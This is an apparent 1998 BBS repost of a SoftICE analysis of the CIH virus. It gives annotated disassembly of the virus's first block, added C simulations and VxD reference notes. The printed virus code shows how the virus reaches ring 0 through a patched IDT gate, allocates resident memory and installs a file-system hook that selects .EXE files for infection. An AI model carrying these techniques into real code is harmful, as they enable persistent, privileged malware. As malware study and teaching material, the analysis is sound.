SoftICE analysis of CIH: results
From: TBsoft (TBsoft), Board: Virus
Subject: SoftICE analysis results [reposted]
Site: 武汉白云黄鹤站 (Wuhan Baiyun Huanghe BBS) (Mon Oct 26 10:51:47 1998), local mail
From: Nova_Zhao@bbs.ustc.edu.cn (真生命), Board: virus
Subject: SoftICE analysis results
Site: 中国科大BBS站 (USTC BBS) (Sun Oct 25 10:37:13 1998)
Relayed via: wuheebbs!ustcnews!ustcbbs
Analysis of CIH
Infected EXE: Sthcd.exe
File length: 209KB
Entry point:
CS:EIP=0137:004002A1 SS:ESP=013F:0069FE38
EAX=004002A0 EBX=00000000 ECX=8159970C EDX=8159974C
ESI=815996EC EDI=81599A08 EBP=0069FF78 EFL=00000A86
DS=013F ES=013F FS=37E7 GS=0000
0137:004002A0 PUSH EBP
0137:004002A1 LEA EAX,[ESP-08] SS:0069FE30=BFF742F3 ;address of the SEH frame that is built two dwords below ESP
0137:004002A5 XOR EBX,EBX
0137:004002A7 XCHG EAX,FS:[EBX] ;FS:[0] is the thread's exception-handler chain head (TIB): link the new frame in, EAX = previous head
0137:004002AA CALL 004002AF
0137:004002AF POP EBX ;EBX = return address of the CALL above, i.e. the virus's own position (delta offset)
0137:004002B0 LEA ECX,[EBX+42] ;ECX = 004002F1, the exception handler
0137:004002B3 PUSH ECX ;frame.handler
0137:004002B4 PUSH EAX ;frame.next = previous FS:[0]; any fault from here on (e.g. on NT, where the IDT is not writable from ring 3) lands in 004002F1 and simply resumes the host
0137:004002B5 PUSH EAX ;these 4 bytes are the buffer for the IDT base
0137:004002B6 SIDT FWORD PTR [ESP-02] ;store the interrupt descriptor table register (48 bits: 16-bit limit at ESP-02, 32-bit linear base at ESP)
0137:004002BB POP EBX ;EBX = IDT base
0137:004002BC ADD EBX,1C ;each gate descriptor is 8 bytes; INT 3's gate is at base+18h, so base+1Ch is the upper dword of that gate
0137:004002BF CLI
0137:004002C0 MOV EBP,[EBX] ;upper dword of the gate: handler offset bits 31..16 in its high word
0137:004002C2 MOV BP,[EBX-04] ;low word of the lower dword: handler offset bits 15..0; EBP now holds the original Int 3 handler
0137:004002C6 LEA ESI,[ECX+12] ;ESI = the new Int 3 handler
0137:004002C9 PUSH ESI
0137:004002CA MOV [EBX-04],SI ;offset bits 15..0
0137:004002CE SHR ESI,10
0137:004002D1 MOV [EBX+02],SI ;offset bits 31..16
0137:004002D5 POP ESI ;new Int 3 handler installed; in this sample ESI=0x00400303. The write works because Windows 9x leaves the IDT page writable from ring 3, and the INT 3 gate has DPL 3
0137:004002D6 INT 3 ;enter ring 0 through the patched gate. ZF is clear (SHR ESI,10 left 0x40), so if DR0 is still zero the handler allocates memory and returns EAX = first block, EDI = allocated memory; if DR0 is nonzero (already resident) it returns to 004002EC instead
0137:004002D7 PUSH ESI ;save ESI
0137:004002D8 MOV ESI,EAX
0137:004002DA MOV ECX,[EAX-04] ;size of this block
0137:004002DD REPZ MOVSB ;copy one block of the virus body to the allocated linear memory
0137:004002DF SUB EAX,08
0137:004002E2 MOV ESI,[EAX] ;pointer to the next block (the size/pointer table sits just below the entry and grows downward)
0137:004002E4 OR ESI,ESI ;finished copying?
0137:004002E6 JZ 004002EA ;yes: done
0137:004002E8 JMP 004002DA ;no: copy the next block
;in this sample the virus body is split into four blocks of 0x160, 0xc8,
;0xc9 and 0xfa bytes, 1003 bytes in total
0137:004002EA POP ESI ;restore ESI
0137:004002EB INT 3 ;ZF is set this time (OR ESI,ESI with ESI=0), so the handler installs the file system hook. Important!!!!
;and puts the original Int 3 handler back before returning
0137:004002EC STI
0137:004002ED XOR EBX,EBX
0137:004002EF JMP 004002F8
0137:004002F1 XOR EBX,EBX ;exception handler: reached only if something above faulted
0137:004002F3 MOV EAX,FS:[EBX]
0137:004002F6 MOV ESP,[EAX] ;unwind ESP back to the virus's SEH frame, then fall into the normal exit
0137:004002F8 POP DWORD PTR FS:[EBX] ;unlink the SEH frame
0137:004002FB POP EAX
0137:004002FC POP EBP
0137:004002FD PUSH 0040A010 ;original entry point of the host: resume the original program
0137:00400302 RET
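An added example, not from the original post: a C model of the copy loop at 004002D8-004002E8. The loop reads a size dword at [EAX-04] and a next-block pointer at [EAX-08] and then steps EAX down by 8, so the table it walks sits immediately below the virus entry and grows downward. The block sizes are the ones reported above; the table layout is inferred from the loop, and the flat memory array, the block addresses and the fill bytes are constructed for the demo.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Table layout implied by the loop (entry = address of block 1):
 *   [entry-4]  size of block 1      [entry-8]  address of block 2
 *   [entry-12] size of block 2      [entry-16] address of block 3
 *   ...                             a zero pointer ends the walk
 * Sizes are those the analysis reports for this sample. */
#define NBLOCKS 4
static const uint32_t kBlockSize[NBLOCKS] = { 0x160, 0xC8, 0xC9, 0xFA };

/* A flat "memory" so addresses can be plain 32-bit offsets as in the listing (constructed). */
#define MEM_SIZE 0x2000
static uint8_t mem[MEM_SIZE];

static uint32_t rd32(uint32_t a) { uint32_t v; memcpy(&v, mem + a, 4); return v; }
static void     wr32(uint32_t a, uint32_t v) { memcpy(mem + a, &v, 4); }

/* Lay out four scattered blocks plus the descriptor table below block 1.
 * Returns the address of block 1, the value EAX holds when the loop starts.
 * All offsets are assumptions for the simulation, not offsets from the sample. */
static uint32_t build_image(void)
{
    const uint32_t entry = 0x100;
    uint32_t blk[NBLOCKS] = { entry, 0x800, 0xA00, 0xC00 };

    for (int i = 0; i < NBLOCKS; i++)                 /* distinct fill byte per block */
        memset(mem + blk[i], 0xA0 + i, kBlockSize[i]);

    uint32_t a = entry;
    for (int i = 0; i < NBLOCKS; i++) {
        wr32(a - 4, kBlockSize[i]);                   /* what MOV ECX,[EAX-04] reads */
        wr32(a - 8, (i + 1 < NBLOCKS) ? blk[i + 1] : 0); /* what MOV ESI,[EAX] reads after SUB EAX,08 */
        a -= 8;
    }
    return entry;
}

/* The loop, register for register.  edi = destination (_PageAllocate's result
 * in the virus).  Returns the number of bytes copied. */
static uint32_t copy_blocks(uint32_t eax, uint32_t edi)
{
    uint32_t start = edi;
    uint32_t esi = eax;                           /* MOV ESI,EAX        */
    for (;;) {
        uint32_t ecx = rd32(eax - 4);             /* MOV ECX,[EAX-04]   */
        memcpy(mem + edi, mem + esi, ecx);        /* REP MOVSB          */
        edi += ecx;
        eax -= 8;                                 /* SUB EAX,08         */
        esi = rd32(eax);                          /* MOV ESI,[EAX]      */
        if (esi == 0) break;                      /* OR ESI,ESI / JZ    */
    }                                             /* JMP: next size is at the new [EAX-04] */
    return edi - start;
}

/* Check that the destination holds the four blocks back to back. */
static int verify_copy(uint32_t dst)
{
    uint32_t off = 0;
    for (int i = 0; i < NBLOCKS; i++) {
        for (uint32_t j = 0; j < kBlockSize[i]; j++)
            if (mem[dst + off + j] != (uint8_t)(0xA0 + i)) return 0;
        off += kBlockSize[i];
    }
    return 1;
}

int main(void)
{
    uint32_t entry = build_image();
    uint32_t dst = 0x1000;                        /* stands in for the allocated pages */
    uint32_t n = copy_blocks(entry, dst);
    printf("copied %u bytes, contiguous copy %s\n", (unsigned)n, verify_copy(dst) ? "ok" : "BAD");
    return 0;
}
```

The point to take away is that the blocks are scattered in the host file but contiguous in the copy, so every branch target in the listing that points past the first 0x160 bytes only makes sense in the allocated memory, not in the host image.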
;new Int 3 handler entry (runs at ring 0)
0137:00400303 JZ 00400337 ;ZF set (second INT 3): install the file system hook
0137:00400305 MOV ECX,DR0 ;DR0 is used as a flag: nonzero means the virus is already resident (a debugger's hardware breakpoint in DR0 trips this check as well)
0137:00400308 JECXZ 0040031A ;zero: not yet resident, allocate memory
0137:0040030A ADD DWORD PTR [ESP],15 ;already resident: return to 004002EC, skipping the copy and the second INT 3
0137:0040030E MOV [EBX-04],BP ;put back the original Int 3 handler (EBP saved at 004002C2)
0137:00400312 SHR EBP,10
0137:00400315 MOV [EBX+02],BP
0137:00400319 IRETD
0137:0040031A MOV DR0,EBX ;mark "resident" with a nonzero DR0 (EBX = IDT base + 1Ch)
0137:0040031D PUSH 0F ;flags = PAGEZEROINIT|PAGEUSEALIGN|PAGECONTIG|PAGEFIXED. C calling convention: the last argument is pushed first
0137:0040031F PUSH ECX ;PhysAddr = NULL (ECX is zero here)
0137:00400320 PUSH FF ;maxPhys = FFFFFFFFh (imm8 sign-extended): no upper bound
0137:00400322 PUSH ECX ;minPhys = 0
0137:00400323 PUSH ECX ;AlignMask = 0
0137:00400324 PUSH ECX ;VM = 0
0137:00400325 PUSH 01 ;pType = PG_SYS, system pages visible in every VM
0137:00400327 PUSH 02 ;nPages = 2 (8KB): the 1003-byte body plus its data area
0137:00400329 INT 20 VXDCall _PageAllocate ;allocate a block of linear memory, address returned in EAX
0137:0040032F ADD ESP,20 ;8 arguments * 4 bytes, the caller cleans up
0137:00400332 XCHG EAX,EDI ;base address goes to EDI
0137:00400333 LEA EAX,[ESI-63] ;address of the first block of the virus body (004002A0)
0137:00400336 IRETD
0137:00400337 LEA EAX,[EDI-0309] ;EDI = end of the copied body (base+3EBh), so EAX = base+0E2h: the file system hook inside the copy, 00400382 in the host image
0137:0040033D PUSH EAX
0137:0040033E INT 20 VXDCall IFSMgr_InstallFileSystemApiHook ;install the file system hook. Important!!!!
;returns in EAX a pointer to the previous hook pointer (the chain head)
0137:00400344 MOV DR0,EAX ;keep it in DR0 (still nonzero: resident)
0137:00400347 POP EAX ;EAX = hook address
0137:00400348 MOV ECX,[ESI+3D] ;dword at 00400340: VMM has just dynamically linked the INT 20 above into CALL [slot], so this is the address of the IFSMgr_InstallFileSystemApiHook service-table slot
0137:0040034B MOV EDX,[ECX] ;EDX = real service entry
0137:0040034D MOV [EAX-04],EDX ;save it 4 bytes before the hook (used by CALL [EBX-04] at 0040036E and 00400374)
0137:00400350 LEA EAX,[EAX-2A] ;hook-2Ah = the routine at 00400358
0137:00400353 MOV [ECX],EAX ;patch the service table: every later call to IFSMgr_InstallFileSystemApiHook now lands in the virus's routine, which keeps the virus hook first in the chain
0137:00400355 CLI
0137:00400356 JMP 0040030E ;restore the Int 3 gate and IRETD
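An added example, not from the original post: the 32-bit IDT gate layout behind 004002B6-004002D5 and 0040030E-00400315, in C. It reads and writes a gate's handler offset both as a structured decode and register for register as the listing does (EBX = IDT base + 1Ch, then [EBX], [EBX-04], [EBX+02]), so the two 16-bit stores can be checked against the 32-bit value. The IDT base, the code selector and the handler addresses are constructed values, not ones from the sample.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* A 32-bit IDT gate is 8 bytes: handler offset bits 15..0 in bytes 0-1, code
 * selector in bytes 2-3, type/DPL in bytes 4-5, offset bits 31..16 in bytes
 * 6-7.  SIDT stores 6 bytes: a 16-bit limit, then the 32-bit linear base. */

static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }

/* SIDT image -> IDT linear base.  The virus does SIDT [ESP-02]; POP EBX: the
 * limit lands in the two bytes below ESP and the POP picks up the base. */
static uint32_t idtr_base(const uint8_t idtr[6]) { return rd32(idtr + 2); }

/* Structured view of a gate's handler offset. */
static uint32_t gate_offset(const uint8_t gate[8])
{
    return (uint32_t)rd16(gate) | ((uint32_t)rd16(gate + 6) << 16);
}
static void gate_set_offset(uint8_t gate[8], uint32_t off)
{
    wr16(gate, (uint16_t)off);
    wr16(gate + 6, (uint16_t)(off >> 16));
}

/* The listing's view.  ebx points 4 bytes into the gate: IDT base + 1Ch for
 * INT 3, since gate 3 starts at 3 * 8 = 18h. */
static uint32_t virus_read_handler(const uint8_t *ebx)
{
    uint32_t ebp = rd32(ebx);                          /* MOV EBP,[EBX]   */
    ebp = (ebp & 0xFFFF0000u) | rd16(ebx - 4);         /* MOV BP,[EBX-04] */
    return ebp;
}
static void virus_write_handler(uint8_t *ebx, uint32_t esi)
{
    wr16(ebx - 4, (uint16_t)esi);                      /* MOV [EBX-04],SI            */
    wr16(ebx + 2, (uint16_t)(esi >> 16));              /* SHR ESI,10 / MOV [EBX+02],SI */
}

/* Build an 8-entry IDT in idt (64 bytes), point INT 3 at orig_handler, swap
 * in new_handler the way 004002CA-004002D1 does, verify the gate, then
 * restore the way 0040030E-00400315 does.  Returns the handler the virus
 * saved in EBP, or 0 if either write failed to land in the gate. */
static uint32_t demo(uint8_t *idt, uint32_t orig_handler, uint32_t new_handler)
{
    memset(idt, 0, 64);
    uint8_t *int3 = idt + 3 * 8;
    wr16(int3 + 2, 0x0028);       /* ring-0 code selector (assumed value) */
    wr16(int3 + 4, 0xEE00);       /* P=1, DPL=3, 32-bit trap gate: INT 3 is usable from ring 3 */
    gate_set_offset(int3, orig_handler);

    uint8_t *ebx = idt + 0x1C;                         /* ADD EBX,1C         */
    uint32_t saved = virus_read_handler(ebx);          /* 004002C0-004002C2  */
    virus_write_handler(ebx, new_handler);             /* 004002CA-004002D1  */
    if (gate_offset(int3) != new_handler) return 0;
    virus_write_handler(ebx, saved);                   /* 0040030E-00400315  */
    if (gate_offset(int3) != orig_handler) return 0;
    return saved;
}

int main(void)
{
    uint8_t idt[64];
    uint8_t idtr[6] = { 0x3F, 0x00, 0x00, 0x00, 0x00, 0x80 }; /* limit 3Fh, base 80000000h (constructed) */
    uint32_t seen = demo(idt, 0xBFF74234u, 0x00400303u);     /* both handler values constructed */
    printf("IDT base %08X, INT 3 handler the virus saved: %08X\n",
           (unsigned)idtr_base(idtr), (unsigned)seen);
    return 0;
}
```

Two things in the gate matter for the trick: the gate's DPL is 3, which is why an INT 3 issued at ring 3 is allowed to enter the handler at all, and on Windows 9x the page holding the IDT is writable from ring 3, which is why the stores at 004002CA and 004002D1 succeed. On Windows NT the same store faults, and that fault is what the SEH frame built at 004002A7 catches.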
;routine that replaces IFSMgr_InstallFileSystemApiHook in the service table (00400358 = hook-2Ah)
0137:00400358 PUSH EBX
0137:00400359 CALL 0040035E
0137:0040035E POP EBX ;delta: EBX = 0040035E
0137:0040035F ADD EBX,24 ;EBX = 00400382, the virus's own file system hook
0137:00400362 PUSH EBX
0137:00400363 INT 20 VXDCall IFSMgr_RemoveFileSystemApiHook ;unhook itself first
0137:00400369 POP EAX
0137:0040036A PUSH DWORD PTR [ESP+08] ;the caller's HookFunc
0137:0040036E CALL [EBX-04] ;the real IFSMgr_InstallFileSystemApiHook (saved at 0040034D): install the caller's hook
0137:00400371 POP ECX
0137:00400372 PUSH EAX ;save the caller's return value
0137:00400373 PUSH EBX
0137:00400374 CALL [EBX-04] ;re-install the virus hook on top, so it is again first in the chain
0137:00400377 POP ECX
0137:00400378 MOV DR0,EAX ;new chain-head pointer
0137:0040037B POP EAX ;hand the caller its own result
0137:0040037C POP EBX
0137:0040037D RET
;0040037E-0040038E: SoftICE started decoding mid-instruction here, so the six lines below are garbage.
;The 4 bytes at 0040037E-00400381 are the slot [hook-04] that 0040034D fills with the real service
;address; the file system hook itself starts at 00400382 as PUSHAD; CALL 00400388; POP ESI;
;ADD ESI,00000303 (ESI then points at the virus data area right after the 1003-byte body).
;The decode is back in sync at 0040038F
0137:0040037E CMP AL,0E
0137:00400381 SHL BYTE PTR [EAX-18],00
0137:00400385 ADD [EAX],AL
0137:00400387 ADD [ESI-7F],BL
0137:0040038A MOV BYTE PTR [EBX],03
0137:0040038D ADD [EAX],AL
;file system hook proper. Its arguments (FSDFnAddr, FunctionNum, Drive, ResourceFlags, CodePage, pir)
;sit on the stack above PUSHAD's 20h bytes and the return address
0137:0040038F TEST BYTE PTR [ESI],01 ;busy flag: already inside the hook?
0137:00400392 JNZ 00400588 ;yes: pass the call through (target lies in a later block)
0137:00400398 LEA EBX,[ESP+28] ;EBX -> FunctionNum (ESP+24 FSDFnAddr, +28 FunctionNum, +2C Drive, +38 pir)
0137:0040039C CMP DWORD PTR [EBX],24 ;IFSFN_OPEN (24h)?
0137:0040039F JNZ 00400582 ;not an open: pass through
0137:004003A5 INC BYTE PTR [ESI] ;set the busy flag
0137:004003A7 ADD ESI,05 ;ESI -> file name buffer in the data area
0137:004003AA PUSH ESI
0137:004003AB MOV AL,[EBX+04] ;Drive (1 = A:, 2 = B:, ...)
0137:004003AE CMP AL,FF ;FFh = UNC path, no drive letter
0137:004003B0 JZ 004003BA
0137:004003B2 ADD AL,40 ;'A' + drive - 1
0137:004003B4 MOV AH,3A ;':'
0137:004003B6 MOV [ESI],EAX ;write "X:" at the start of the buffer
0137:004003B8 INC ESI
0137:004003B9 INC ESI
0137:004003BA PUSH 00 ;charSet = 0 (Windows ANSI)
0137:004003BC PUSH 7F ;maxLength
0137:004003BE MOV EBX,[EBX+10] ;EBX = pir, the ioreq
0137:004003C1 MOV EAX,[EBX+0C] ;ir_ppath, the canonicalized Unicode ParsedPath
0137:004003C4 ADD EAX,04 ;skip the two length words of the ParsedPath header
0137:004003C7 PUSH EAX ;pUniPath
0137:004003C8 PUSH ESI ;pBCSPath
0137:004003C9 INT 20 VXDCall UniToBCSPath ;convert to an ANSI path after the "X:"; EAX = length of the converted part
0137:004003CF ADD ESP,10
0137:004003D2 CMP DWORD PTR [EAX+ESI-04],4558452E ;last four bytes == ".EXE"? (the string read as a little-endian dword)
0137:004003DA POP ESI
0137:004003DB JNZ 0040057F ;not an .EXE: pass through
0137:004003E1 CMP WORD PTR [EBX+18],01 ;ir_options == ACTION_OPENEXISTING? Only opens of existing files are candidates
0137:004003E6 JNZ 0040057F
0137:004003EC MOV AX,4300 ;IFSMgr_Ring0_FileIO function R0_FILEATTRIBUTES (43h), AL=0: get attributes of the file named at ESI
0137:004003F0 INT 20 VXDCall IFSMgr_Ring0_FileIO
0137:004003F6 JB 0040057F ;carry set: error, pass through
0137:004003FC PUSH ECX ;save the attributes returned in CX so they can be restored after infection
0137:004003FD MOV EDI,[ESI+00000062] ;misdecoded: the first block ends at 00400400 and the bytes from there on are zero
0137:00400403 ADD [EAX],AL ;00 00: the same ADD [EAX],AL repeats through 0137:0040043D, zero-filled bytes, not code
//The above is the first part of the virus body: 160h bytes at 004002A0-004003FF, placed in unused space of the host's PE header page.
//The other three blocks live elsewhere in the file and are contiguous with it only in the allocated copy, which is why branch targets such as 00400582 and 00400588 point at zeros in the host image.
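An added example, not from the original post: the decision the hook at 0040038F-004003F6 makes before it touches a file, written out in C. It models only the arguments the listing reads: the function number at [ESP+28], the drive at [EBX+04], the ioreq option word at [EBX+18] and the BCS path that UniToBCSPath produces after the "X:". The struct, its field names and the sample paths are this example's own; IFSFN_OPEN = 24h, the ".EXE" dword 4558452Eh, the 7Fh length limit and the option value 1 are the constants the listing compares against. Like the virus, it assumes a little-endian machine and that the path IFSMgr hands over is already upper case.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define IFSFN_OPEN           0x24
#define ACTION_OPENEXISTING  0x0001      /* the value the listing expects at [EBX+18] */
#define DRIVE_UNC            0xFF        /* Drive = FFh: UNC path, no "X:" prefix */
#define DOT_EXE_LE           0x4558452Eu /* ".EXE" read as a little-endian dword */
#define BCS_MAXLEN           0x7F        /* the PUSH 7F maxLength */

/* Constructed stand-in for the hook's arguments (not a DDK structure). */
struct open_call {
    uint32_t    function_num;
    uint8_t     drive;                   /* 1 = A:, 2 = B:, ... or DRIVE_UNC */
    uint16_t    options;                 /* ir_options */
    const char *uni_path_as_bcs;         /* what UniToBCSPath would emit (no NUL) */
    size_t      uni_len;
};

/* 004003AB-004003CF: "X:" first, then the converted path.  Returns the total
 * length written, or 0 if the buffer is too small or the path exceeds 7Fh. */
static size_t build_bcs_name(const struct open_call *c, char *out, size_t outsz)
{
    size_t n = 0;
    if (c->drive != DRIVE_UNC) {                       /* CMP AL,FF / JZ */
        if (outsz < 2) return 0;
        out[n++] = (char)(0x40 + c->drive);            /* ADD AL,40  -> 'A' + drive - 1 */
        out[n++] = ':';                                /* MOV AH,3A */
    }
    if (c->uni_len > BCS_MAXLEN || n + c->uni_len >= outsz) return 0;
    memcpy(out + n, c->uni_path_as_bcs, c->uni_len);
    n += c->uni_len;
    out[n] = '\0';                                     /* UniToBCSPath does not NUL-terminate; we do */
    return n;
}

/* CMP DWORD PTR [EAX+ESI-04],4558452E: the last four bytes of the converted
 * part must be exactly ".EXE".  It is a byte compare, so "x.exe" does not match. */
static int ends_with_dot_exe(const char *path_after_drive, size_t converted_len)
{
    uint32_t tail;
    if (converted_len < 4) return 0;
    memcpy(&tail, path_after_drive + converted_len - 4, 4);
    return tail == DOT_EXE_LE;
}

/* The whole gate: 1 if the virus would go on to IFSMgr_Ring0_FileIO (AX=4300h)
 * for this call, 0 if it falls through to the original hook.  On success
 * name holds the "X:\..." string the virus would have built. */
static int hook_would_act(const struct open_call *c, char *name, size_t namesz)
{
    if (c->function_num != IFSFN_OPEN) return 0;       /* CMP DWORD PTR [EBX],24 */
    size_t total = build_bcs_name(c, name, namesz);
    if (total == 0) return 0;
    size_t prefix = (c->drive == DRIVE_UNC) ? 0 : 2;
    if (!ends_with_dot_exe(name + prefix, total - prefix)) return 0;
    if (c->options != ACTION_OPENEXISTING) return 0;   /* CMP WORD PTR [EBX+18],01 */
    return 1;
}

int main(void)
{
    char name[BCS_MAXLEN + 3] = "";
    struct open_call c = { IFSFN_OPEN, 3, ACTION_OPENEXISTING,
                           "\\WINDOWS\\NOTEPAD.EXE", sizeof("\\WINDOWS\\NOTEPAD.EXE") - 1 };
    int act = hook_would_act(&c, name, sizeof name);
    printf("%s -> %s\n", name, act ? "infection candidate" : "ignored");
    return 0;
}
```

The checks are cheap because they are positional: a fixed function number, a fixed action value and a four-byte tail compare. That is also why the hook is noisy in a different way than a signature scanner expects: it never looks at the file's contents before deciding, only at how the caller opened it.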
Notes:
VxD services
1. _PageAllocate
C prototype: ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM,
ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr,
ULONG flags);
The arguments are pushed right to left (C calling convention), so the eight pushes in the listing map as:
0137:0040031D PUSH 0F -> flags = PAGEZEROINIT | PAGEUSEALIGN | PAGECONTIG | PAGEFIXED
0137:0040031F PUSH ECX -> PhysAddr = NULL
0137:00400320 PUSH FF -> maxPhys = FFFFFFFFh
0137:00400322 PUSH ECX -> minPhys = 0
0137:00400323 PUSH ECX -> AlignMask = 0
0137:00400324 PUSH ECX -> VM = 0
0137:00400325 PUSH 01 -> pType = PG_SYS
0137:00400327 PUSH 02 -> nPages = 2
Page types and flags:
#define PG_VM 0
#define PG_SYS 1
#define PG_RESERVED1 2
#define PG_PRIVATE 3
#define PG_RESERVED2 4
#define PG_RELOCK 5 /* PRIVATE to MMGR */
#define PG_INSTANCE 6
#define PG_HOOKED 7
#define PG_IGNORE 0xFFFFFFFF
#define PAGEZEROINIT 0x00000001
#define PAGEUSEALIGN 0x00000002
#define PAGECONTIG 0x00000004
#define PAGEFIXED 0x00000008
#define PAGEDEBUGNULFAULT 0x00000010
#define PAGEZEROREINIT 0x00000020
#define PAGENOCOPY 0x00000040
#define PAGELOCKED 0x00000080
#define PAGELOCKEDIFDP 0x00000100
#define PAGESETV86PAGEABLE 0x00000200
#define PAGECLEARV86PAGEABLE 0x00000400
#define PAGESETV86INTSLOCKED 0x00000800
#define PAGECLEARV86INTSLOCKED 0x00001000
#define PAGEMARKPAGEOUT 0x00002000
#define PAGEPDPSETBASE 0x00004000
#define PAGEPDPCLEARBASE 0x00008000
#define PAGEDISCARD 0x00010000
#define PAGEPDPQUERYDIRTY 0x00020000
#define PAGEMAPFREEPHYSREG 0x00040000
#define PAGENOMOVE 0x10000000
#define PAGEMAPGLOBAL 0x40000000
#define PAGEMARKDIRTY 0x80000000
2.IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook(
pIFSFileHookFunc HookFunc
)
3.IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook(
pIFSFileHookFunc HookFunc
)
4.UniToBCSPath
UniToBCSPath(
unsigned char * pBCSPath,
ParsedPath * pUniPath,
unsigned int maxLength,
int charSet
)
This service converts a canonicalized unicode pathname to a normal pathname in the
specified BCS character set, i.e. the path element lengths are converted into proper
path separators in addition to the character set conversion. Currently, the Windows
ANSI codepage or the current OEM codepage in the system can be specified for the
conversion. It is important to note that the source and destination buffers cannot
be the same nor can they overlap. They should be two separate buffers. This service
does not terminate the converted path with a NUL character; the caller of the service
needs to do this, if necessary.
5.IFSMgr_Ring0_FileIO
This service provides a register-based VxD callable interface to the common file system
functions. Other VxDs in the system can use this service to make filesystem calls without
having to issue int 21h calls. An FSD itself can call this interface to do filesystem
operations in certain situations. The different functions provided as part of this
service are described below. Since these calls can be made only by 'trusted' system
components, the IFS manager does not do any parameter validation on them. Users of this
service should be very careful to check that they are passing in valid parameters.
OpenCreateFile
This interface is the same as the interface for the int 21h extended open function
(06Ch). If the R0_OPENCREATFILE function code is used, the operation is done in an
independent context, so that handle is globally accessible from any VM. If the
R0_OPENCREAT_IN_CONTEXT function code is used, the operation is done in the context
of the current thread and process.
[EAX]
R0_OPENCREATFILE or R0_OPENCREAT_IN_CONTEXT
[BX]
Open mode and other flags. The flags are exactly the same as those on the int 21h
function 6Ch. Please refer to the specification of the int 21h function for details.
[CX]
Attributes to use on a create operation.
[DL]
Action to be performed. Look at the int 21h, function 6Ch documentation for details.
[DH]
Special flags that are available only on this API. This register is reserved and
not used on the int 21h, function 6Ch API.
Special Ring 0 Api Open Flags:
Value Meaning
R0_NO_CACHE Indicates that reads and writes on the file should not be cached.
All operations will be directly done to the disk.
R0_SWAPPER_CALL Indicates that the i/o operation is being performed to the system
swap file. This is a privileged call that should be set only by the
memory manager when it is doing i/o to page stuff in and out of the disk.
The filesystem that handles swap file io needs to ensure certain
conditions to prevent deadlocks. These are described in section 8.3.4
of this document.
[ESI]
Flat pointer to the pathname of the file to be opened/created.
On return: carry flag clear, operation was successful.
[EAX] Handle to opened file.
[ECX] Actual action performed. For the return values, please refer to the document describing the int 21h, function 6Ch api.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used EAX, ECX, Flags.
ReadFile
This function is called to read a file previously opened by OpenCreateFile. The
handle must be one returned from the OpenCreateFile service described above; it
cannot be a handle opened by issuing an int 21h. If the R0_READFILE_IN_CONTEXT function code i
[EAX]
R0_READFILE or R0_READFILE_IN_CONTEXT.
[EBX]
File handle.
[ECX]
Count of bytes to be read. This can be a full 32-bit transfer count.
[EDX]
Position in file the read operation needs to start at.
[ESI]
Flat pointer to the buffer the data is to read into.
On return: carry flag clear, no error.
[ECX] Number of bytes actually read.
Carry flag set, an error occurred. [AX] contains the errorcode.